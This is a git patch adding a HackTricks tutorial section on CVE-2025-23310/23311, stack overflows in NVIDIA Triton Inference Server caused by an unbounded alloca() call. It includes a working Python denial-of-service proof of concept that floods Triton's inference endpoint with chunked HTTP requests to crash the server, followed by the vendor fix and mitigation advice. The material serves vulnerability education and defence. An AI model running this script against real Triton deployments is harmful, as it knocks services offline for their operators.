From 27be343664618771bc310819580bdd1905d2b45c Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 5 Aug 2025 12:44:20 +0000 Subject: [PATCH] Add content from: Uncovering memory corruption in NVIDIA Triton (as a new hire... --- .../stack-overflow/README.md | 64 +++++++++++++++++++ 1 file changed, 64 insertions(+) diff --git a/src/binary-exploitation/stack-overflow/README.md b/src/binary-exploitation/stack-overflow/README.md index a154c51a0e4..90764e763e4 100644 --- a/src/binary-exploitation/stack-overflow/README.md +++ b/src/binary-exploitation/stack-overflow/README.md @@ -131,8 +131,72 @@ Even though stack canaries abort the process, an attacker still gains a **Denial * Always provide a **maximum field width** (e.g. `%511s`). * Prefer safer alternatives such as `snprintf`/`strncpy_s`. +### Real-World Example: CVE-2025-23310 & CVE-2025-23311 (NVIDIA Triton Inference Server) + +NVIDIA’s Triton Inference Server (≤ v25.06) contained multiple **stack-based overflows** reachable through its HTTP API. +The vulnerable pattern repeatedly appeared in `http_server.cc` and `sagemaker_server.cc`: + +```c +int n = evbuffer_peek(req->buffer_in, -1, NULL, NULL, 0); +if (n > 0) { + /* allocates 16 * n bytes on the stack */ + struct evbuffer_iovec *v = (struct evbuffer_iovec *) + alloca(sizeof(struct evbuffer_iovec) * n); + ... +} +``` + +1. `evbuffer_peek` (libevent) returns the **number of internal buffer segments** that compose the current HTTP request body. +2. Each segment causes a **16-byte** `evbuffer_iovec` to be allocated on the **stack** via `alloca()` – **without any upper bound**. +3. By abusing **HTTP _chunked transfer-encoding_**, a client can force the request to be split into **hundreds-of-thousands of 6-byte chunks** (`"1\r\nA\r\n"`). This makes `n` grow unbounded until the stack is exhausted. + +#### Proof-of-Concept (DoS) +```python +#!/usr/bin/env python3 +import socket, sys + +def exploit(host="localhost", port=8000, chunks=523_800): + s = socket.create_connection((host, port)) + s.sendall(( + f"POST /v2/models/add_sub/infer HTTP/1.1\r\n" + f"Host: {host}:{port}\r\n" + "Content-Type: application/octet-stream\r\n" + "Inference-Header-Content-Length: 0\r\n" + "Transfer-Encoding: chunked\r\n" + "Connection: close\r\n\r\n" + ).encode()) + + for _ in range(chunks): # 6-byte chunk ➜ 16-byte alloc + s.send(b"1\r\nA\r\n") # amplification factor ≈ 2.6x + s.sendall(b"0\r\n\r\n") # end of chunks + s.close() + +if __name__ == "__main__": + exploit(*sys.argv[1:]) +``` +A ~3 MB request is enough to overwrite the saved return address and **crash** the daemon on a default build. + +#### Patch & Mitigation +The 25.07 release replaces the unsafe stack allocation with a **heap-backed `std::vector`** and gracefully handles `std::bad_alloc`: + +```c++ +std::vector v_vec; +try { + v_vec = std::vector(n); +} catch (const std::bad_alloc &e) { + return TRITONSERVER_ErrorNew(TRITONSERVER_ERROR_INVALID_ARG, "alloc failed"); +} +struct evbuffer_iovec *v = v_vec.data(); +``` + +Lessons learned: +* Never call `alloca()` with attacker-controlled sizes. +* Chunked requests can drastically change the shape of server-side buffers. +* Validate / cap any value derived from client input *before* using it in memory allocations. + ## References * [watchTowr Labs – Stack Overflows, Heap Overflows and Existential Dread (SonicWall SMA100)](https://labs.watchtowr.com/stack-overflows-heap-overflows-and-existential-dread-sonicwall-sma100-cve-2025-40596-cve-2025-40597-and-cve-2025-40598/) +* [Trail of Bits – Uncovering memory corruption in NVIDIA Triton](https://blog.trailofbits.com/2025/08/04/uncovering-memory-corruption-in-nvidia-triton-as-a-new-hire/) {{#include ../../banners/hacktricks-training.md}}